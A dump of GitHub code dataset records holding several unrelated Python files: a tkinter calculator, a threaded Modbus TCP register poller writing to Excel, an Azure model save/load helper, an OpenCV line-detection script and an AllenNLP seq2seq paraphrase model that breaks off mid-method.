new_url\n","repo_name":"everstou/autoScript","sub_path":"MitmScript/mitmproxy-master/mitmproxy/addons/mapremote.py","file_name":"mapremote.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2781528644","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\n\r\n\r\nclass Functions:\r\n def __init__(self, number1, number2, app):\r\n self.numero1 = number1\r\n self.numero2 = number2\r\n self.app = app\r\n def soma(self):\r\n somar = float(self.numero1.get())+float(self.numero2.get())\r\n resposta = tk.Label(text=f'Resposta da soma: {somar}',bg='#DCDCDC', font=(\"Arial\", 10))\r\n resposta.grid(columnspan=2, row=5, pady=10, padx=5, sticky='nswe')\r\n\r\n def mult(self):\r\n multiplicar = float(self.numero1.get())*float(self.numero2.get())\r\n resposta = tk.Label(text=f'Resposta da Multiplicação: {multiplicar}', bg='#DCDCDC', font=(\"Arial\", 10))\r\n resposta.grid(columnspan=2, row= 5, pady=10, padx=10,sticky='nswe')\r\n\r\n def dividir(self):\r\n try:\r\n divisao = float(self.numero1.get())/float(self.numero2.get())\r\n resposta = tk.Label(text=f'Resposta da divisão: {divisao:.2f}', bg='#DCDCDC', font=(\"Arial\", 10))\r\n resposta.grid(columnspan=2, row=5, pady=10, padx=10, sticky='nswe')\r\n except ZeroDivisionError:\r\n resposta = tk.Label(text= 'Você esta tentando dividir um numero por 0',bg='#DCDCDC', font=(\"Arial\", 10))\r\n resposta.grid(columnspan=2, row=5, pady=10, padx=10, sticky='nswe')\r\n\r\n def sub(self):\r\n subtrair = float(self.numero1.get()) - float(self.numero2.get())\r\n resposta = tk.Label(text=f'Resposta da subtração: {subtrair}', bg='#DCDCDC', font=(\"Arial\", 10))\r\n resposta.grid(columnspan=2, row=5, pady=10, sticky='nswe')\r\n\r\n def potencia(self):\r\n potenciacao = float(self.numero1.get())**float(self.numero2.get())\r\n resposta = tk.Label(text=f'Resposta da potenciação: {potenciacao}', bg='#DCDCDC', font=(\"Arial\", 10))\r\n resposta.grid(columnspan=2, row=5, pady=10, sticky='nswe')\r\n\r\n def porcentagem(self):\r\n porc = float(self.numero1.get())*float(self.numero2.get()) / 100\r\n resposta = tk.Label(text=f'Resposta da porcentagem: {porc}', bg='#DCDCDC', font=(\"Arial\", 10))\r\n resposta.grid(columnspan=2, row=5, pady=10, sticky='nswe')\r\n\r\n def direitos_reservados(self):\r\n vazio = tk.Label()\r\n vazio.grid(row = 5, columnspan=2, padx=10, pady=10)\r\n mensagem = tk.Label(text='Todos os direitos reservados. @Jefferson.python', fg='black',bg='#D3D3D3',font=(\"-weight bold-size 10\", 8))\r\n mensagem.grid(columnspan=2, row=7, sticky='nswe')\r\n\r\n def fechar_app(self):\r\n confirmacao = tk.messagebox.askquestion('Fechando calculadora','Deseja realmente sair?')\r\n if confirmacao == 'yes':\r\n self.app.destroy()\r\n else:\r\n pass\r\n def center(self, win):\r\n\r\n win.update_idletasks()\r\n\r\n width = win.winfo_width()\r\n frm_width = win.winfo_rootx() - win.winfo_x()\r\n win_width = width + 2 * frm_width\r\n\r\n height = win.winfo_height()\r\n titlebar_height = win.winfo_rooty() - win.winfo_y()\r\n win_height = height + titlebar_height + frm_width\r\n\r\n x = win.winfo_screenwidth() // 2 - win_width // 2\r\n y = win.winfo_screenheight() // 2 - win_height // 2\r\n\r\n win.geometry('{}x{}+{}+{}'.format(width, height, x, y))\r\n\r\n win.deiconify()\r\n\r\nif '__main__' == __name__:\r\n\r\n pass","repo_name":"jeffin-Dev/Calculadora_Basica","sub_path":"BackendCalculation.py","file_name":"BackendCalculation.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"41139094064","text":"import threading\nimport time\nfrom pyModbusTCP.client import ModbusClient\nimport openpyxl\nimport random\nimport numpy as np\n\nt_start = time.perf_counter()\n\n\nbook = openpyxl.open('test.xlsx', read_only=True)\nsheet = book.active\nbook_save = openpyxl.Workbook()\nsheet_save = book_save.active\nfull_list = list()\nsingle_dict = dict()\nresult_list = list()\ntemp_result_list = list()\ntemptemp = []\nserver_host = ''\nserver_port = 0\nstart_reg = 0\nreg_qnty = 0\nb = 0\ncount_check = 0\nkeyslist = []\nfinal_list = []\nfinal_output = []\n\n\nfor rows in range(1, sheet.max_row+1):\n single_dict[\"server_host\"] = sheet[rows][0].value\n single_dict[\"server_port\"] = int(sheet[rows][1].value)\n single_dict[\"start_reg\"] = int(sheet[rows][3].value)\n single_dict[\"reg_qnty\"] = int(sheet[rows][4].value)\n temptemp = sheet[rows][5].value\n res = {int(sub.split(\":\")[0]): sub.split(\":\")[1] for sub in temptemp[1:-1].split(\", \")}\n single_dict[\"task_list\"] = res\n # single_dict[\"task_list\"] = sheet[rows][5].value\n full_list.append(single_dict.copy())\n # print(temptemp)\n # print(res)\n\n\n# print(full_list)\nall_time = time.perf_counter() - t_start\nprint(f'Время генерации списка: {all_time}')\n\n\ndef modbus(host, port, addr, reg, task_list):\n # open or reconnect TCP to server\n c = ModbusClient()\n c.host(host)\n c.port(port)\n time.sleep(random.random())\n if not c.is_open():\n if not c.open():\n print(\"unable to connect to \" + host + \":\" + str(port) + str(addr))\n final_output.append([f'unable to connect {host}'])\n # if open() is ok, read register (modbus function 0x03)\n if c.is_open():\n # read 10 registers at address 0, store result in regs list\n regs = c.read_holding_registers(addr, reg)\n # if success display registers\n if regs:\n typelist = list(task_list.values())\n keyslist = list(task_list.keys())\n # print(\"reg ad #0 to 9: \" + str(regs))\n final_list = [regs[key] for key in keyslist]\n # print(str(final_list))\n # print(str(keyslist))\n # print(str(typelist))\n q = 0\n final_small_output = [host, addr, reg]\n for type in typelist:\n if type == \"UINT16\":\n count = np.uint16(regs[keyslist[q]])\n # print(count, q)\n key_final = regs[keyslist[q]]\n final_small_output.append(f'{keyslist[q]}: {count}')\n q += 1\n elif type == \"INT16\":\n count = np.int16(regs[keyslist[q]])\n # print(count, q)\n final_small_output.append(f'{keyslist[q]}: {count}')\n q += 1\n elif type == \"UINT32\":\n count = (np.uint16(regs[keyslist[q] + 1]) << 16) + np.uint16(regs[keyslist[q]])\n # print(count, q)\n final_small_output.append(f'{keyslist[q]}: {count}')\n q += 1\n elif type == \"INT32\":\n count = (np.int16(regs[keyslist[q] + 1]) << 16) + np.uint16(regs[keyslist[q]])\n # print(count, q)\n final_small_output.append(f'{keyslist[q]}: {count}')\n q += 1\n else:\n print(\"error data TYPE\")\n final_small_output.append([f'Error data TYPE {host}{keyslist[q]}: {keyslist[q]}'])\n final_output.append(final_small_output)\n else:\n final_output.append([f'unable to read register {host} {addr}'])\n\n\nthreads = []\n\nfor device in full_list:\n t = threading.Thread(target=modbus, args=[device['server_host'], device['server_port'], device['start_reg'],\n device['reg_qnty'], device['task_list']])\n t.start()\n threads.append(t)\n\nfor thread in threads:\n thread.join()\n\n\nfor answ in final_output:\n sheet_save.append(answ)\n\nbook_save.save('result.xlsx')\nall_time = time.perf_counter() - t_start\nprint(f'Время выполнения опроса: {all_time}')\n","repo_name":"SmoktoK/ModBus_Satec","sub_path":"old_version/SATEC.py","file_name":"SATEC.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33579145029","text":"# import shutil\nfrom file_operations.File_operations_Azure import File_Operations\n\nclass File_Operation:\n \"\"\"\n This class shall be used to save the model after training\n and load the saved model for prediction.\n\n Written By: iNeuron Intelligence\n Version: 1.0\n Revisions: None\n\n \"\"\"\n def __init__(self,file_object,logger_object):\n self.file_object = file_object\n self.logger_object = logger_object\n self.fileoperation = File_Operations(log=self.logger_object)\n self.model_directory = \"models\"\n\n def create_model_directory(self):\n self.logger_object.db_log(self.file_object,\n message={\n \"message\": \"Creating directory to keep training models\"})\n try:\n self.fileoperation.create_container(container_name=self.model_directory)\n except Exception as e:\n raise Exception()\n\n\n def save_model(self,model,filename):\n \"\"\"\n Method Name: save_model\n Description: Save the model file to directory\n Outcome: File gets saved\n On Failure: Raise Exception\n\n Written By: iNeuron Intelligence\n Version: 1.0\n Revisions: None\n\"\"\"\n self.logger_object.db_log(self.file_object,\n message={\"message\": \"Entered the save_model method of the File_Operation class\"})\n\n try:\n # self.fileoperation.create_container(container_name=self.model_directory)\n # path = os.path.join(self.model_directory,filename) #create seperate directory for each cluster\n # if os.path.isdir(path): #remove previously existing models for each clusters\n # shutil.rmtree(self.model_directory)\n # os.makedirs(path)\n # else:\n # os.makedirs(path) #\n # with open(path +'/' + filename+'.sav',\n # 'wb') as f:\n # pickle.dump(model, f) # save the model to file\n filename = filename+'.sav'\n self.fileoperation.savemodel(container_name=self.model_directory, filename=filename, model=model)\n self.logger_object.db_log(self.file_object,\n message={\"success Message\":\n \"Model File \"+filename+\" saved. Exited the save_model method of the Model_Finder class\"})\n\n return 'success'\n except Exception as e:\n self.logger_object.db_log(self.file_object,\n message={\"Error message\":\n \"Exception occured in save_model method of the Model_Finder class. Exception message: \" + str(e)})\n self.logger_object.db_log(self.file_object,\n message={\"Error while saving\":\n 'Model File '+filename+' could not be saved. Exited the save_model method of the Model_Finder class'})\n raise Exception()\n\n def load_model(self,filename):\n \"\"\"\n Method Name: load_model\n Description: load the model file to memory\n Output: The Model file loaded in memory\n On Failure: Raise Exception\n\n Written By: iNeuron Intelligence\n Version: 1.0\n Revisions: None\n \"\"\"\n self.logger_object.db_log(self.file_object,\n message={\"load model message\": \"Entered the load_model method of the File_Operation class\"})\n try:\n # with open(self.model_directory + filename + '/' + filename + '.sav',\n # 'rb') as f:\n if '.sav' not in filename:\n filename = filename+'.sav'\n model = self.fileoperation.loadmodel(container_name=self.model_directory, filename=filename)\n self.logger_object.db_log(self.file_object,\n message={\"model loaded successfully\": \"Model File \" + filename + \"loaded. Exited the load_model method of the Model_Finder class\"})\n # return pickle.load(f)\n return model\n except Exception as e:\n self.logger_object.db_log(self.file_object,\n message={\"Model load Error\":\n \"Exception occured in load_model method of the Model_Finder class. Exception message: \" + str(e)})\n self.logger_object.db_log(self.file_object,\n message= {\"Model Error message\":\n \"Model File \" + filename + \" could not be saved. Exited the load_model method of the Model_Finder class\"})\n raise Exception()\n\n def find_correct_model_file(self,cluster_number):\n \"\"\"\n Method Name: find_correct_model_file\n Description: Select the correct model based on cluster number\n Output: The Model file\n On Failure: Raise Exception\n\n Written By: iNeuron Intelligence\n Version: 1.0\n Revisions: None\n \"\"\"\n self.logger_object.db_log(self.file_object,\n message={\"correct model select\": \"Entered the find_correct_model_file method of the File_Operation class\"})\n try:\n self.cluster_number= cluster_number\n self.folder_name=self.model_directory\n # self.list_of_model_files = []\n # self.list_of_files = self.fileoperation.getallFiles(container_name=self.folder_name)\n\n for self.file in self.list_of_files:\n try:\n if (self.file.index(str( self.cluster_number))!=-1):\n self.model_name = self.file\n except:\n continue\n self.model_name=self.model_name\n self.logger_object.db_log(self.file_object,\n {\"success message\": \"Exited the find_correct_model_file method of the Model_Finder class.\"})\n return self.model_name\n except Exception as e:\n self.logger_object.db_log(self.file_object,\n {\"Model selector Error message\":\n \"Exception occured in find_correct_model_file method of the Model_Finder class. Exception message: \" + str(e)})\n self.logger_object.db_log(self.file_object,\n {\"Model selector Error message\":\n \"Exited the find_correct_model_file method of the Model_Finder class with Failure\"})\n raise Exception()","repo_name":"arkajit0/waferfault-detection","sub_path":"file_operations/file_methods.py","file_name":"file_methods.py","file_ext":"py","file_size_in_byte":7067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16387190808","text":"import cv2, time, math\nimport numpy as np\n\ndef nothing(x):\n pass\n\ncam = cv2.VideoCapture(0)\n\ncv2.namedWindow(\"ColorTrackbars\")\ncv2.createTrackbar(\"min - H\", \"ColorTrackbars\", 0, 179, nothing)\ncv2.createTrackbar(\"min - S\", \"ColorTrackbars\", 0, 255, nothing)\ncv2.createTrackbar(\"min - V\", \"ColorTrackbars\", 0, 255, nothing)\ncv2.createTrackbar(\"max - H\", \"ColorTrackbars\", 179, 179, nothing)\ncv2.createTrackbar(\"max - S\", \"ColorTrackbars\", 255, 255, nothing)\ncv2.createTrackbar(\"max - V\", \"ColorTrackbars\", 100, 255, nothing)\n\ncolor = (255,255,255)\nprev_frame_time = 0\nnew_frame_time = 0\nif cam.isOpened():\n ret,frame = cam.read()\nelse: \n ret = False\nwhile ret :\n ret,frame = cam.read()\n \n frame = cv2.imread(\"Seeker/TargetImages/line1.png\")\n frame_width, frame_height = (480,480)\n frame = cv2.resize(frame,(frame_width, frame_height))\n #frame =cv2.flip(frame,-1)\n center_frame = (frame_width//2, frame_height//2)\n blurred = cv2.GaussianBlur(frame,(3,3),0)\n hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n #Calculate FPS\n new_frame_time = time.time()\n fps = 1/(new_frame_time-prev_frame_time)\n prev_frame_time = new_frame_time\n cv2.putText(frame,\"FPS:{}\".format(int(fps)),(15,15),cv2.FONT_HERSHEY_SIMPLEX,.5,(255,255,255),1,cv2.LINE_AA)#Displays fps\n\n target_track_radius = 50\n cv2.circle(frame, (frame_width//2, frame_height//2), target_track_radius, (255,0,0), 1)\n cv2.line(frame,(int(frame_width/2 ),0),(int(frame_width/2 ),int(frame_height)),(255,0,0),1)\n cv2.line(frame,(0,int(frame_height/2 )),(int(frame_width),int(frame_height/2 )),(255,0,0),1)\n \n\n min_h = cv2.getTrackbarPos(\"min - H\", \"ColorTrackbars\")\n min_s = cv2.getTrackbarPos(\"min - S\", \"ColorTrackbars\")\n min_v = cv2.getTrackbarPos(\"min - V\", \"ColorTrackbars\")\n max_h = cv2.getTrackbarPos(\"max - H\", \"ColorTrackbars\")\n max_s = cv2.getTrackbarPos(\"max - S\", \"ColorTrackbars\")\n max_v = cv2.getTrackbarPos(\"max - V\", \"ColorTrackbars\")\n min_color = np.array([min_h, min_s, min_v])\n max_color = np.array([max_h, max_s, max_v])\n mask_color = cv2.inRange(hsv_frame, min_color, max_color)\n\n contours, hierarchy = cv2.findContours(mask_color, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE) #SIMPLE\n #contours = max(contours, key = cv2.contourArea)\n \n contours = sorted(contours, key = cv2.contourArea)\n contours = contours[-1:] # Take the object with the largest area\n\n for contour in contours:\n if cv2.contourArea(contour) >= 500: # If area is big enough, find its center etc.\n contour = cv2.approxPolyDP(contour, 10, closed=True)\n cv2.drawContours(frame, contour, -1, (255,255,0), 5, lineType = cv2.FILLED)\n print(\"len(contour): \",len(contour))\n cv2.polylines(frame, [contour], True, (0,255,255), 2)\n \"\"\"\n x,y,w,h = cv2.boundingRect(contour)\n x,y,w,h = (int(x),int(y),int(w),int(h))\n cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,255),3)\n cv2.line(frame, (x+(w//2),frame_height),(x+(w//2),frame_width ),(0,255,0),3)\n \"\"\"\n\n moment = cv2.moments(contour) # To find the center of the contour, we use cv2.moment\n (x_contour, y_contour) = (moment['m10'] / (moment['m00'] + 1e-5), moment['m01'] / (moment['m00'] + 1e-5)) # calculate center of the contour\n center_contour = (int(x_contour), int(y_contour))\n cv2.circle(frame, center_contour, 5, (255,0,255),2)\n\n cv2.line(frame, center_frame, center_contour,(0,0,255),1)\n atan = math.atan2(center_frame[1]-center_contour[1], center_frame[0]-center_contour[0])\n angle = math.degrees(atan)\n angle = int(90-angle)\n cv2.putText(frame, \"{}*\".format(angle), center_frame , cv2.FONT_HERSHEY_SIMPLEX, 0.55, color, 1)\n\n cv2.imshow(\"realTimeCamera\",frame) \n cv2.imshow(\"mask_color\",mask_color)\n \n #cv2.imshow(\"Blurred\",blurred)\n key=cv2.waitKey(1)\n if key==27:\n break\ncv2.destroyAllWindows()\ncam.release()","repo_name":"solanoctua/Seeker","sub_path":"Source/LineDetection.py","file_name":"LineDetection.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34498479304","text":"from typing import Dict, List, Tuple, Optional\n\nimport numpy\nfrom overrides import overrides\nimport torch\nimport torch.nn.functional as F\nfrom torch.nn.modules.linear import Linear\nfrom torch.nn.modules.rnn import LSTMCell\nfrom torch.nn import EmbeddingBag, Sequential\n\nfrom allennlp.common.checks import ConfigurationError\nfrom allennlp.common.util import START_SYMBOL, END_SYMBOL\nfrom allennlp.data.vocabulary import Vocabulary\nfrom allennlp.modules.attention import LegacyAttention\nfrom allennlp.modules import Attention, TextFieldEmbedder, Seq2SeqEncoder\nfrom allennlp.modules.similarity_functions import SimilarityFunction\nfrom allennlp.models.model import Model\nfrom allennlp.modules.token_embedders import Embedding\nfrom allennlp.modules.feedforward import FeedForward\nfrom allennlp.nn import util, RegularizerApplicator\nfrom allennlp.nn.beam_search import BeamSearch\nfrom allennlp.training.metrics import BLEU\n\n\n@Model.register(\"curiosity_paraphrase_seq2seq\")\nclass FactParaphraseSeq2Seq(Model):\n \"\"\"\n Given facts and dialog acts, it generates the paraphrased message.\n TODO: add dialog & dialog acts history\n\n This implementation is based off the default SimpleSeq2Seq model,\n which takes a sequence, encodes it, and then uses the encoded\n representations to decode another sequence.\n \"\"\"\n\n def __init__(\n self,\n vocab: Vocabulary,\n source_embedder: TextFieldEmbedder,\n source_encoder: Seq2SeqEncoder,\n max_decoding_steps: int,\n dialog_acts_encoder: FeedForward = None,\n attention: Attention = None,\n attention_function: SimilarityFunction = None,\n n_dialog_acts: int = None,\n beam_size: int = None,\n target_namespace: str = \"tokens\",\n target_embedding_dim: int = None,\n scheduled_sampling_ratio: float = 0.0,\n use_bleu: bool = True,\n use_dialog_acts: bool = True,\n regularizers: Optional[RegularizerApplicator] = None,\n ) -> None:\n super().__init__(vocab, regularizers)\n self._target_namespace = target_namespace\n self._scheduled_sampling_ratio = scheduled_sampling_ratio\n\n # We need the start symbol to provide as the input at the first\n # timestep of decoding, and end symbol as a way to indicate the end\n # of the decoded sequence.\n self._start_index = self.vocab.get_token_index(\n START_SYMBOL, self._target_namespace\n )\n self._end_index = self.vocab.get_token_index(END_SYMBOL, self._target_namespace)\n\n if use_bleu:\n pad_index = self.vocab.get_token_index(\n self.vocab._padding_token, self._target_namespace\n )\n self._bleu = BLEU(\n exclude_indices={pad_index, self._end_index, self._start_index}\n )\n else:\n self._bleu = None\n\n # At prediction time, we use a beam search to find the most\n # likely sequence of target tokens.\n beam_size = beam_size or 1\n self._max_decoding_steps = max_decoding_steps\n self._beam_search = BeamSearch(\n self._end_index, max_steps=max_decoding_steps, beam_size=beam_size\n )\n\n # Dense embedding of source (Facts) vocab tokens.\n self._source_embedder = source_embedder\n\n # Encodes the sequence of source embeddings into a sequence of hidden states.\n self._source_encoder = source_encoder\n\n if use_dialog_acts:\n # Dense embedding of dialog acts.\n da_embedding_dim = dialog_acts_encoder.get_input_dim()\n self._dialog_acts_embedder = EmbeddingBag(n_dialog_acts, da_embedding_dim)\n\n # Encodes dialog acts\n self._dialog_acts_encoder = dialog_acts_encoder\n\n else:\n self._dialog_acts_embedder = None\n self._dialog_acts_encoder = None\n\n num_classes = self.vocab.get_vocab_size(self._target_namespace)\n\n # Attention mechanism applied to the encoder output for each step.\n if attention:\n if attention_function:\n raise ConfigurationError(\n \"You can only specify an attention module or an \"\n \"attention function, but not both.\"\n )\n self._attention = attention\n elif attention_function:\n self._attention = LegacyAttention(attention_function)\n else:\n self._attention = None\n\n # Dense embedding of vocab words in the target space.\n target_embedding_dim = target_embedding_dim or source_embedder.get_output_dim()\n self._target_embedder = Embedding(num_classes, target_embedding_dim)\n\n # Decoder output dim needs to be the same as the encoder output dim\n # since we initialize the hidden state of the decoder with the final\n # hidden state of the encoder.\n self._encoder_output_dim = self._source_encoder.get_output_dim()\n if use_dialog_acts:\n self._merge_encoder = Sequential(\n Linear(\n self._source_encoder.get_output_dim()\n + self._dialog_acts_encoder.get_output_dim(),\n self._encoder_output_dim,\n )\n )\n self._decoder_output_dim = self._encoder_output_dim\n\n if self._attention:\n # If using attention, a weighted average over encoder outputs will\n # be concatenated to the previous target embedding to form the input\n # to the decoder at each time step.\n self._decoder_input_dim = self._decoder_output_dim + target_embedding_dim\n else:\n # Otherwise, the input to the decoder is just the previous target embedding.\n self._decoder_input_dim = target_embedding_dim\n\n # We'll use an LSTM cell as the recurrent cell that produces a hidden state\n # for the decoder at each time step.\n # TODO (pradeep): Do not hardcode decoder cell type.\n self._decoder_cell = LSTMCell(self._decoder_input_dim, self._decoder_output_dim)\n\n # We project the hidden state from the decoder into the output vocabulary space\n # in order to get log probabilities of each target token, at each time step.\n self._output_projection_layer = Linear(self._decoder_output_dim, num_classes)\n\n def take_step(\n self, last_predictions: torch.Tensor, state: Dict[str, torch.Tensor]\n ) -> Tuple[torch.Tensor, Dict[str, torch.Tensor]]:\n \"\"\"\n Take a decoding step. This is called by the beam search class.\n \"\"\"\n # shape: (group_size, num_classes)\n output_projections, state = self._prepare_output_projections(\n last_predictions, state\n )\n\n # shape: (group_size, num_classes)\n class_log_probabilities = F.log_softmax(output_projections, dim=-1)\n\n return class_log_probabilities, state\n\n @overrides\n def forward(\n self, # type: ignore\n source_tokens: Dict[str, torch.LongTensor],\n target_tokens: Dict[str, torch.LongTensor] = None,\n dialog_acts: Optional[torch.Tensor] = None,\n sender: Optional[torch.Tensor] = None,\n metadata: Optional[Dict] = None,\n ) -> Dict[str, torch.Tensor]:\n \"\"\"\n Make foward pass with decoder logic for producing the entire target sequence.\n \"\"\"\n source_state, dialog_acts_state = self._encode(source_tokens, dialog_acts)\n\n if target_tokens:\n state = self._init_decoder_state(source_state, dialog_acts_state)\n # The `_forward_loop` decodes the input sequence and\n # computes the loss during training and validation.\n output_dict = self._forward_loop(state, target_tokens)\n else:\n output_dict = {}\n\n if not self.training:\n state = self._init_decoder_state(source_state, dialog_acts_state)\n predictions = self._forward_beam_search(state)\n output_dict.update(predictions)\n if target_tokens and self._bleu:\n # shape: (batch_size, beam_size, max_sequence_length)\n top_k_predictions = output_dict[\"predictions\"]\n # shape: (batch_size, max_predicted_sequence_length)\n best_predictions = top_k_predictions[:, 0, :]\n self._bleu(best_predictions, target_tokens[\"tokens\"])\n\n return output_dict\n\n @overrides\n def decode(self, output_dict: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]:\n \"\"\"\n Finalize predictions.\n \"\"\"\n predicted_indices = output_dict[\"predictions\"]\n if not isinstance(predicted_indices, numpy.ndarray):\n predicted_indices = predicted_indices.detach().cpu().numpy()\n all_predicted_tokens = []\n for indices in predicted_indices:\n # Beam search gives us the top k results for each source sentence\n # in the batch but we just want the single best.\n if len(indices.shape) > 1:\n indices = indices[0]\n indices = list(indices)\n # Collect indices till the first end_symbol\n if self._end_index in indices:\n indices = indices[: indices.index(self._end_index)]\n predicted_tokens = [\n self.vocab.get_token_from_index(x, namespace=self._target_namespace)\n for x in indices\n ]\n all_predicted_tokens.append(predicted_tokens)\n output_dict[\"predicted_tokens\"] = all_predicted_tokens\n return output_dict\n\n def _encode(\n self, source_tokens: Dict[str, torch.Tensor], dialog_acts: torch.Tensor = None\n ) -> Tuple[Dict[str, torch.Tensor], torch.Tensor]:\n # Encode source tokens\n source_state = self._encode_source_tokens(source_tokens)\n\n # Encode dialog acts\n if self._dialog_acts_encoder:\n dialog_acts_state = self._encode_dialog_acts(dialog_acts)\n\n else:\n dialog_acts_state = None\n\n return (source_state, dialog_acts_state)\n\n def _encode_source_tokens(\n self, source_tokens: Dict[str, torch.Tensor]\n ) -> Dict[str, torch.Tensor]:\n # shape: (batch_size, max_input_sequence_length, encoder_input_dim)\n embedded_input = self._source_embedder(source_tokens)\n # shape: (batch_size, max_input_sequence_length)\n source_mask = util.get_text_field_mask(source_tokens)\n # shape: (batch_size, max_input_sequence_length, encoder_output_dim)\n encoder_outputs = self._source_encoder(embedded_input, source_mask)\n return {\"source_mask\": source_mask, \"encoder_outputs\": encoder_outputs}\n\n def _encode_dialog_acts(self, dialog_acts: torch.Tensor) -> torch.Tensor:\n # shape: (batch_size, dialog_acts_embeddings_size)\n embedded_dialog_acts = self._dialog_acts_embedder(dialog_acts)\n\n # shape: (batch_size, dim_encoder)\n dialog_acts_state = self._dialog_acts_encoder(embedded_dialog_acts)\n return dialog_acts_state\n\n def _init_decoder_state(\n self,\n source_state: Dict[str, torch.Tensor],\n dialog_acts_state: torch.Tensor = None,\n ) -> Dict[str, torch.Tensor]:\n batch_size = source_state[\"source_mask\"].size(0)\n\n # shape: (batch_size, encoder_output_dim)\n final_encoder_output = util.get_final_encoder_states(\n source_state[\"encoder_outputs\"],\n source_state[\"source_mask\"],\n self._source_encoder.is_bidirectional(),\n )\n\n # Condition the source tokens state with dialog acts state\n if self._dialog_acts_encoder:\n final_encoder_output = self._merge_encoder(\n torch.cat([final_encoder_output, dialog_acts_state], dim=1)\n )\n\n # Initialize the decoder hidden state with the final output of the encoder.\n # shape: (batch_size, decoder_output_dim)\n source_state[\"decoder_hidden\"] = final_encoder_output\n # shape: (batch_size, decoder_output_dim)\n source_state[\"decoder_context\"] = source_state[\"encoder_outputs\"].new_zeros(\n batch_size, self._decoder_output_dim\n )\n return source_state\n\n def _forward_loop(\n self,\n state: Dict[str, torch.Tensor],\n target_tokens: Dict[str, torch.LongTensor] = None,\n ) -> Dict[str, torch.Tensor]:\n \"\"\"\n Make forward pass during training or do greedy search during prediction.\n Notes\n -----\n We really only use the predictions from the method to test that beam search\n with a beam size of 1 gives the same results.\n \"\"\"\n # shape: (batch_size, max_input_sequence_length)\n source_mask = state[\"source_mask\"]\n\n batch_size = source_mask.size()[0]\n\n if target_tokens:\n # shape: (batch_size, max_target_sequence_length)\n targets = target_tokens[\"tokens\"]\n\n _, target_sequence_length = targets.size()\n\n # The last input from the target is either padding or the end symbol.\n # Either way, we don't have to process it.\n num_decoding_steps = target_sequence_length - 1\n else:\n num_decoding_steps = self._max_decoding_steps\n\n # Initialize target predictions with the start index.\n # shape: (batch_size,)\n last_predictions = source_mask.new_full(\n (batch_size,), fill_value=self._start_index\n )\n\n step_logits: List[torch.Tensor] = []\n step_predictions: List[torch.Tensor] = []\n for timestep in range(num_decoding_steps):\n if self.training and torch.rand(1).item() < self._scheduled_sampling_ratio:\n # Use gold tokens at test time and at a rate of\n # 1 - _scheduled_sampling_ratio during training.\n # shape: (batch_size,)\n input_choices = last_predictions\n elif not target_tokens:\n # shape: (batch_size,)\n input_choices = last_predictions\n else:\n # shape: (batch_size,)\n input_choices = targets[:, timestep]\n\n # shape: (batch_size, num_classes)\n output_projections, state = self._prepare_output_projections(\n input_choices, state\n )\n\n # list of tensors, shape: (batch_size, 1, num_classes)\n step_logits.append(output_projections.unsqueeze(1))\n\n # shape: (batch_size, num_classes)\n class_probabilities = F.softmax(output_projections, dim=-1)\n\n # shape (predicted_classes): (batch_size,)\n _, predicted_classes = torch.max(class_probabilities, 1)\n\n # shape (predicted_classes): (batch_size,)\n last_predictions = predicted_classes\n\n step_predictions.append(last_predictions.unsqueeze(1))\n\n # shape: (batch_size, num_decoding_steps)\n predictions = torch.cat(step_predictions, 1)\n\n output_dict = {\"predictions\": predictions}\n\n if target_tokens:\n # shape: (batch_size, num_decoding_steps, num_classes)\n logits = torch.cat(step_logits, 1)\n\n # Compute loss.\n target_mask = util.get_text_field_mask(target_tokens)\n loss = self._get_loss(logits, targets, target_mask)\n output_dict[\"loss\"] = loss\n\n return output_dict\n\n def _forward_beam_search(\n self, state: Dict[str, torch.Tensor]\n ) -> Dict[str, torch.Tensor]:\n \"\"\"Make forward pass during prediction using a beam search.\"\"\"\n batch_size = state[\"source_mask\"].size()[0]\n start_predictions = state[\"source_mask\"].new_full(\n (batch_size,), fill_value=self._start_index\n )\n\n # shape (all_top_k_predictions): (batch_size, beam_size, num_decoding_steps)\n # shape (log_probabilities): (batch_size, beam_size)\n all_top_k_predictions, log_probabilities = self._beam_search.search(\n start_predictions, state, self.take_step\n )\n\n output_dict = {\n \"class_log_probabilities\": log_probabilities,\n \"predictions\": all_top_k_predictions,\n }\n return output_dict\n\n def _prepare_output_projections(\n self, last_predictions: torch.Tensor, state: Dict[str, torch.Tensor]\n ) -> Tuple[torch.Tensor, Dict[str, torch.Tensor]]:\n \"\"\"\n Decode current state and last prediction to produce produce projections\n into the target space, which can then be used to get probabilities of\n each target token for the next step.\n Inputs are the same as for `take_step()`.\n \"\"\"\n # shape: (group_size, max_input_sequence_length, encoder_output_dim)\n encoder_outputs = state[\"encoder_outputs\"]\n\n # shape: (group_size, max_input_sequence_length)\n source_mask = state[\"source_mask\"]\n\n # shape: (group_size, decoder_output_dim)\n decoder_hidden = state[\"decoder_hidden\"]\n\n # shape: (group_size, decoder_output_dim)\n decoder_context = state[\"decoder_context\"]\n\n # shape: (group_size, target_embedding_dim)\n embedded_input = self._target_embedder(last_predictions)\n\n if self._attention:\n # shape: (group_size, encoder_output_dim)\n attended_input = self._prepare_attended_input(\n decoder_hidden, encoder_outputs, source_mask\n )\n\n # shape: (group_size, decoder_output_dim + target_embedding_dim)\n decoder_input = torch.cat((attended_input, embedded_input), -1)\n else:\n # shape: (group_size, target_embedding_dim)\n decoder_input = embedded_input\n\n # shape (decoder_hidden): (batch_size, decoder_output_dim)\n # shape (decoder_context): (batch_size, decoder_output_dim)\n decoder_hidden, decoder_context = self._decoder_cell(\n decoder_input, (decoder_hidden, decoder_context)\n )\n\n state[\"decoder_hidden\"] = decoder_hidden\n state[\"decoder_context\"] = decoder_context\n\n # shape: (group_size, num_classes)\n output_projections = self._output_projection_layer(decoder_hidden)\n\n return output_projections, state\n\n def 